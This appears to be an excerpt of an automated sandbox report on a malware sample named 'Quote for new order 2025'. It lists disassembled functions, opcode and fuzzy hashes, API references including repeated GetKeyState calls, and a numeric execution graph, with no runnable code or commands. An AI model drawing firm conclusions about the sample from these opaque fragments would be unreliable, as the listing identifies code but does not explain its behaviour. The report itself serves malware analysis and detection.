                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: da8983e1b24c0676d0fc1ac6c65b27fa156af9a31ee0516691b0617fb4ffd74b
                                                                                                                                                        • Instruction ID: 5ea30af032a2b4fac3d27970ca351e0dfc08fd46f79136ffece9171fe6632e26
                                                                                                                                                        • Opcode Fuzzy Hash: da8983e1b24c0676d0fc1ac6c65b27fa156af9a31ee0516691b0617fb4ffd74b
                                                                                                                                                        • Instruction Fuzzy Hash: 861100B1C006498FCB10DF9AD444BCEFBF4EB88324F10842AD458A3250C378A944CFA5
                                                                                                                                                        Function 09E06040 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: ed3a0fa4478b10f542b9336d95151baeb751fcce399ee7dc2c0bd341fb3a7838
                                                                                                                                                        • Instruction ID: a0be00606c0a06acd045920485d8b8c1d71e71add30e976567ae53c330bd3943
                                                                                                                                                        • Opcode Fuzzy Hash: ed3a0fa4478b10f542b9336d95151baeb751fcce399ee7dc2c0bd341fb3a7838
                                                                                                                                                        • Instruction Fuzzy Hash: 491100B1C00649CFCB20DF9AD444BCEFBF4EB88324F10852AD418A3250C378A984CFA5
                                                                                                                                                        Function 09E0603C Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544623404.0000000009E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E00000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e00000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 6d125bf76ef15b86f582ab973450d1a096e85312b61218330de9cfd6182e07b8
                                                                                                                                                        • Instruction ID: 1644b6db820a822561777fc5856cfd10bcd448d922eaa151bb63f1222e336e93
                                                                                                                                                        • Opcode Fuzzy Hash: 6d125bf76ef15b86f582ab973450d1a096e85312b61218330de9cfd6182e07b8
                                                                                                                                                        • Instruction Fuzzy Hash: 541100B5C00649CFCB20DFAAD545BCEFBF4EB88324F10856AD458A7250C379A984CFA5
                                                                                                                                                        Function 014FD210 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9a06f6f7e0cb3c84155e68f8e000a6720192bbfa6bd2a2690a030722f88cdca2
                                                                                                                                                        • Instruction ID: 00d539eadfded16d0e33fd25b301a347cc46f2745acce0f86d2b503a54476f47
                                                                                                                                                        • Opcode Fuzzy Hash: 9a06f6f7e0cb3c84155e68f8e000a6720192bbfa6bd2a2690a030722f88cdca2
                                                                                                                                                        • Instruction Fuzzy Hash: 5B21F779904200DFDB06DF98D9C4B1BBF65FB88320F20C56EEA054A366C336D416CBA2
                                                                                                                                                        Function 0150D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05be211752cda14fcff0cb28db6d0090252b4feb4263ee408d8b7b728e923de7
                                                                                                                                                        • Instruction ID: e73a7fc6affd73ab3c0d0c077887aff2bb3b85955a775e9570e84444c3c32033
                                                                                                                                                        • Opcode Fuzzy Hash: 05be211752cda14fcff0cb28db6d0090252b4feb4263ee408d8b7b728e923de7
                                                                                                                                                        • Instruction Fuzzy Hash: 2E210771504201EFDB06DFD8D5C0B2ABBB5FB84324F20C96DE9094F296C33AD446CA61
                                                                                                                                                        Function 0150D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 35b938fd174e04ca896428517fd19080d7b0ebbf7aa6804af16d1f16efef1ae1
                                                                                                                                                        • Instruction ID: 1eedf33098e4dfaf4c0442d0b7409a0d85085998618073d47ebfa28a68580744
                                                                                                                                                        • Opcode Fuzzy Hash: 35b938fd174e04ca896428517fd19080d7b0ebbf7aa6804af16d1f16efef1ae1
                                                                                                                                                        • Instruction Fuzzy Hash: DC210071604200DFDB16DFD8D994B2ABBB5FB84314F20C969D80E4F296D33AD446CA61
                                                                                                                                                        Function 0150D488 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c2ea8d1e556e23316d5b3f4b650aac6539c6eed48f7fc6c6bcfabece07fc3567
                                                                                                                                                        • Instruction ID: e71aeaecb1a472570b5f70a7f6fb8bbb9c8adc47ba53d54d29fe233cdb344da6
                                                                                                                                                        • Opcode Fuzzy Hash: c2ea8d1e556e23316d5b3f4b650aac6539c6eed48f7fc6c6bcfabece07fc3567
                                                                                                                                                        • Instruction Fuzzy Hash: 7121D475504244DFDB12DFD8D984B2ABBB5FB84328F24C569EC094F286C37AE446CA62
                                                                                                                                                        Function 0150D2D4 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 71484bd972349f34ffa625247b72787b747acad1f50650019fc723c4e8c9c75c
                                                                                                                                                        • Instruction ID: b488f1997468ba778c55e9ad5d66961834754ff586a257eeca615409e728208f
                                                                                                                                                        • Opcode Fuzzy Hash: 71484bd972349f34ffa625247b72787b747acad1f50650019fc723c4e8c9c75c
                                                                                                                                                        • Instruction Fuzzy Hash: 8A2105B1544200DFD702DFD8D684B6EFBB5FB84714F24C669D8494F296C33AD406C6A1
                                                                                                                                                        Function 0150D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b665d0a12648d77961094a8b921558da67b0fcd7d65798a5bcc6d9c17e7d7b22
                                                                                                                                                        • Instruction ID: 12937bfb5f6baee2f0848182d78c4fa4502d3d70632a761dc27fc88d6ee70e66
                                                                                                                                                        • Opcode Fuzzy Hash: b665d0a12648d77961094a8b921558da67b0fcd7d65798a5bcc6d9c17e7d7b22
                                                                                                                                                        • Instruction Fuzzy Hash: EA2192755093808FDB03CFA4D994715BF71FB46214F28C5DAD8498F6A7C33A980ACB62
                                                                                                                                                        Function 014FD20B Relevance: .1, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                        • Instruction ID: a1c348ec32c11df3f04ecdd2fcb45253dabc9a5b604de169b89b9c06fe5662e0
                                                                                                                                                        • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                                                        • Instruction Fuzzy Hash: F021907A504240DFDB06CF54D9C4B16BF61FB84324F24C5AADD050A766C336D416CB91
                                                                                                                                                        Function 0150D483 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction ID: 8b6af1ebaf67d1c34b069d8874131f0108db83d17b4e75c791da65900f75396c
                                                                                                                                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                        • Instruction Fuzzy Hash: 8B116075504284DFDB12CF94D5C4B2ABF71FB84328F24C6AADC494B696C33AD44ACB92
                                                                                                                                                        Function 0150D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction ID: 24c1ed4b46863bdfabcf824138b9ab51cfa52abadf937f649703e47499491167
                                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction Fuzzy Hash: 1411BB75504280DFDB02CF98C5C4B19BFB1FB84224F24C6AAD8494F696C33AD40ACB61
                                                                                                                                                        Function 0150D2CF Relevance: .1, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528536107.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_150d000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction ID: c0a04bc116dfdc0ed98df8c49facc82c4346975a1d667f80d81265a0bbd76ed1
                                                                                                                                                        • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                        • Instruction Fuzzy Hash: 8E11A076504680CFDB12CF98D6C475AFFB1FB84614F24C6AAD8494B696C33AD40ACB92
                                                                                                                                                        Function 014FD75D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4d2d1318aa44334d6fba0811945788a9e56dc304789d6c98315301b044f722bd
                                                                                                                                                        • Instruction ID: 37d3ed89036720fb0252f5f967ba7ad0cb8e97386ab755425123cf2b0209fb32
                                                                                                                                                        • Opcode Fuzzy Hash: 4d2d1318aa44334d6fba0811945788a9e56dc304789d6c98315301b044f722bd
                                                                                                                                                        • Instruction Fuzzy Hash: 2501F7315083809EE7109A59C984767BFE8EF41320F18C42FEE084F3A6C238D840C672
                                                                                                                                                        Function 014FD6E7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b71723c512319e947b7a2baed8e0cc8b7912ad0bfb8fd49ff44534d6b65b5141
                                                                                                                                                        • Instruction ID: 5c61774e69c9539f19d28797b01a8cebd6f6b80a4412ec53b5ef9a4d071a05b3
                                                                                                                                                        • Opcode Fuzzy Hash: b71723c512319e947b7a2baed8e0cc8b7912ad0bfb8fd49ff44534d6b65b5141
                                                                                                                                                        • Instruction Fuzzy Hash: 81F04976600640AF93208F0AC885C23FBFDEBC4670715C55EE94A8B762C631FC42CEA0
                                                                                                                                                        Function 014FD75C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: be22d7801615f40609f8e8b8b9c683ae0bf1f0c2159d3b807dd4c6701e8b2eb7
                                                                                                                                                        • Instruction ID: d919ceba5f9f54d345ebd15c1150ce89823742ad4dfccdc090818f9a426524a9
                                                                                                                                                        • Opcode Fuzzy Hash: be22d7801615f40609f8e8b8b9c683ae0bf1f0c2159d3b807dd4c6701e8b2eb7
                                                                                                                                                        • Instruction Fuzzy Hash: 13F062715083849EE7118A1AC8C4B63FFE8EF45624F18C45AEE484F396C3799844CA71
                                                                                                                                                        Function 014FD6D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528439308.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_14fd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 29898f795469ca9c984cf67c4673b5ab949e60934bdabcc958f2d2b8c14610ce
                                                                                                                                                        • Instruction ID: 6d060c7f5359476d7151c5ad1f2d40f884e1499ff00f1b99fc5e1de9b2773644
                                                                                                                                                        • Opcode Fuzzy Hash: 29898f795469ca9c984cf67c4673b5ab949e60934bdabcc958f2d2b8c14610ce
                                                                                                                                                        • Instruction Fuzzy Hash: D5F03C75104A80AFD3258F06C984C23BFF9EF89660719848DE8864B362C631FC42CF60

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 09E5E8F1 Relevance: 7.6, APIs: 5, Instructions: 115keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyState.USER32(00000001), ref: 09E5E94D
                                                                                                                                                        • GetKeyState.USER32(00000002), ref: 09E5E992
                                                                                                                                                        • GetKeyState.USER32(00000004), ref: 09E5E9D7
                                                                                                                                                        • GetKeyState.USER32(00000005), ref: 09E5EA1C
                                                                                                                                                        • GetKeyState.USER32(00000006), ref: 09E5EA61
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1649606143-0
                                                                                                                                                        • Opcode ID: 24b5e279bbbe167170c48019a3f2361bbbee15c8fb60b03807c905cb07889d82
                                                                                                                                                        • Instruction ID: 4392d721451abc4c4da4b0c5166a07c1fc05ed494b912a5d58b668769e0c6860
                                                                                                                                                        • Opcode Fuzzy Hash: 24b5e279bbbe167170c48019a3f2361bbbee15c8fb60b03807c905cb07889d82
                                                                                                                                                        • Instruction Fuzzy Hash: 2C41C3B1800785DEEB10DF69C44D3AEBFF4AB05308F20805ED48AAB291C3795A85CF96
                                                                                                                                                        Function 09E583B8 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3544688384.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_9e50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: Xbq$$^q
                                                                                                                                                        • API String ID: 0-1593437937
                                                                                                                                                        • Opcode ID: 209a7b06c8208d8a93a401d279183056e58d4426ed8c84451243e332d3fadd8a
                                                                                                                                                        • Instruction ID: 9f28bc58aed678a64f3e21d35d3de48977067bdee12475fad072ed1ccd4b9e4a
                                                                                                                                                        • Opcode Fuzzy Hash: 209a7b06c8208d8a93a401d279183056e58d4426ed8c84451243e332d3fadd8a
                                                                                                                                                        • Instruction Fuzzy Hash: 1F81B374B002188FDB19AB79885467E7BB7BFC4740F05852DE817EB388CE358C068791
                                                                                                                                                        Function 07984F08 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: Te^q
                                                                                                                                                        • API String ID: 0-671973202
                                                                                                                                                        • Opcode ID: 3089ab8c77a1bd5a8486bcae3c5b2b7f7f36e471e7ade74ef9864a12afd9dd7a
                                                                                                                                                        • Instruction ID: f2778e4fe587acf830ce80976bd3c17fa8bccd9aa5a28f0999c31608e7236113
                                                                                                                                                        • Opcode Fuzzy Hash: 3089ab8c77a1bd5a8486bcae3c5b2b7f7f36e471e7ade74ef9864a12afd9dd7a
                                                                                                                                                        • Instruction Fuzzy Hash: CF718DB4A0010ADFDB54DF59C480BADFBB2FF89318F16C525E8199B365EB309895CB80
                                                                                                                                                        Function 0155DBD0 Relevance: .5, Instructions: 525COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: de31c3706319006d7445ce3d38aea2cc5ba59610fbfa242864e21508c4a53b22
                                                                                                                                                        • Instruction ID: 89a1d7abc3d37ab84686186a255633cbb16d8a9d8d0f09628b308f0ebfe15734
                                                                                                                                                        • Opcode Fuzzy Hash: de31c3706319006d7445ce3d38aea2cc5ba59610fbfa242864e21508c4a53b22
                                                                                                                                                        • Instruction Fuzzy Hash: AB5249B1600706CFD712EF68F88C2997BB1FB42314BA0C21AD5516F2E9D7B4658ACF94
                                                                                                                                                        Function 0155C1B8 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3528929042.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_1550000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3fcf5b0cd0ee0fc94e0b2d563c978023bf1f167b171a247b42be635e8303e5de
                                                                                                                                                        • Instruction ID: 1393272bd5875a9f1256d71e427696f33a26fef444d40201229799f26e49f7c7
                                                                                                                                                        • Opcode Fuzzy Hash: 3fcf5b0cd0ee0fc94e0b2d563c978023bf1f167b171a247b42be635e8303e5de
                                                                                                                                                        • Instruction Fuzzy Hash: 94A15E32A0031A8FCF05DFB4D89459EBBB6FF85300B15856BE916AF225DB31E945CB80
                                                                                                                                                        Function 079894B8 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.3542821888.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_7980000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a5a85bf3e7bb27842127f8b791057c2899ac62318a50d266dcf9325e75ab825b
                                                                                                                                                        • Instruction ID: b6775e9b7591aad08b22de89d2c97c310729a435aff6cb7d86cdc09c51224a28
                                                                                                                                                        • Opcode Fuzzy Hash: a5a85bf3e7bb27842127f8b791057c2899ac62318a50d266dcf9325e75ab825b
                                                                                                                                                        • Instruction Fuzzy Hash: B49160B0E0020ADFDF50DFA9C9957EDBBF6AF88318F148129D405AB354EB74A845CB81

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:6.2%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:2.5%
                                                                                                                                                        Total number of Nodes:1848
                                                                                                                                                        Total number of Limit Nodes:49
                                                                                                                                                        execution_graph 38691 41725a malloc 38692 417282 38691->38692 38693 417275 38691->38693 38695 4186b6 11 API calls 38692->38695 38695->38693 36558 443223 36561 43262c 36558->36561 36560 44322f 36562 43264a 36561->36562 36574 432661 36561->36574 36563 432653 36562->36563 36564 432668 36562->36564 36575 4188fe 11 API calls 36563->36575 36576 432245 memcpy 36564->36576 36567 4326c3 36569 43270b memset 36567->36569 36577 417aad 11 API calls 36567->36577 36568 432673 36568->36567 36572 4326ec 36568->36572 36568->36574 36569->36574 36571 4326dd 36571->36569 36571->36574 36578 4188fe 11 API calls 36572->36578 36574->36560 36575->36574 36576->36568 36577->36571 36578->36574 36549 4166c7 36552 416435 36549->36552 36551 4166e7 36553 416441 36552->36553 36554 416453 GetPrivateProfileIntW 36552->36554 36557 4162c5 memset _itow WritePrivateProfileStringW 36553->36557 36554->36551 36556 41644e 36556->36551 36557->36556 36548 444892 19 API calls 38690 41729b free 36389 42a711 36390 42a722 36389->36390 36394 42bb13 36389->36394 36392 42a768 36390->36392 36393 42a76f 36390->36393 36409 427661 36390->36409 36426 422092 36392->36426 36454 42219c 98 API calls 36393->36454 36459 417bb8 11 API calls 36394->36459 36395 42802d 36453 4261a6 121 API calls 36395->36453 36400 42792a 36452 4186b6 11 API calls 36400->36452 36402 427a26 36404 424a43 memset memcpy memcpy 36404->36409 36405 42b99d 36410 42b9b6 36405->36410 36413 42b9eb 36405->36413 36409->36394 36409->36400 36409->36404 36409->36405 36412 427ff1 36409->36412 36422 427912 36409->36422 36425 427988 36409->36425 36442 424748 memset memcpy 36409->36442 36443 424adc 15 API calls 36409->36443 36444 424ab5 memset memcpy memcpy 36409->36444 36445 424598 13 API calls 36409->36445 36447 426151 11 API calls 36409->36447 36448 42608f 91 API calls 36409->36448 36455 417bb8 11 API calls 36410->36455 36451 417bb8 11 API calls 36412->36451 36414 42b9e6 36413->36414 36457 4186b6 11 API calls 36413->36457 36458 4261a6 121 API calls 36414->36458 36419 42b9ca 36456 4186b6 11 API calls 36419->36456 36422->36402 36446 417bb8 11 API calls 36422->36446 36425->36422 36449 424598 13 API calls 36425->36449 36450 424638 12 API calls 36425->36450 36427 4220a4 36426->36427 36429 4220a9 36426->36429 36469 4203be 98 API calls 36427->36469 36430 4220ba 36429->36430 36431 422181 36429->36431 36432 42210b 36429->36432 36430->36409 36431->36430 36435 421cb6 87 API calls 36431->36435 36433 422110 36432->36433 36434 422134 36432->36434 36460 421b33 36433->36460 36434->36430 36439 422157 36434->36439 36466 421ba4 36434->36466 36435->36430 36439->36430 36441 422092 98 API calls 36439->36441 36441->36430 36442->36409 36443->36409 36444->36409 36445->36409 36446->36400 36447->36409 36448->36409 36449->36425 36450->36425 36451->36400 36452->36395 36453->36402 36454->36409 36455->36419 36456->36414 36457->36414 36458->36402 36459->36400 36461 421b50 36460->36461 36464 421b49 36460->36464 36474 420d7e 36461->36474 36465 421b91 36464->36465 36484 4460ad 11 API calls 36464->36484 36465->36430 36470 421cb6 36465->36470 36467 420dc3 87 API calls 36466->36467 36468 421bb5 36467->36468 36468->36434 36469->36429 36472 421cbd 36470->36472 36471 421d03 36471->36430 36472->36471 36473 421b33 87 API calls 36472->36473 36473->36472 36475 420d8a 36474->36475 36476 420d99 36474->36476 36488 4460ad 11 API calls 36475->36488 36485 420d05 36476->36485 36479 420d94 36479->36464 36482 420db0 36482->36479 36490 420dc3 36482->36490 36484->36465 36494 41dda9 36485->36494 36488->36479 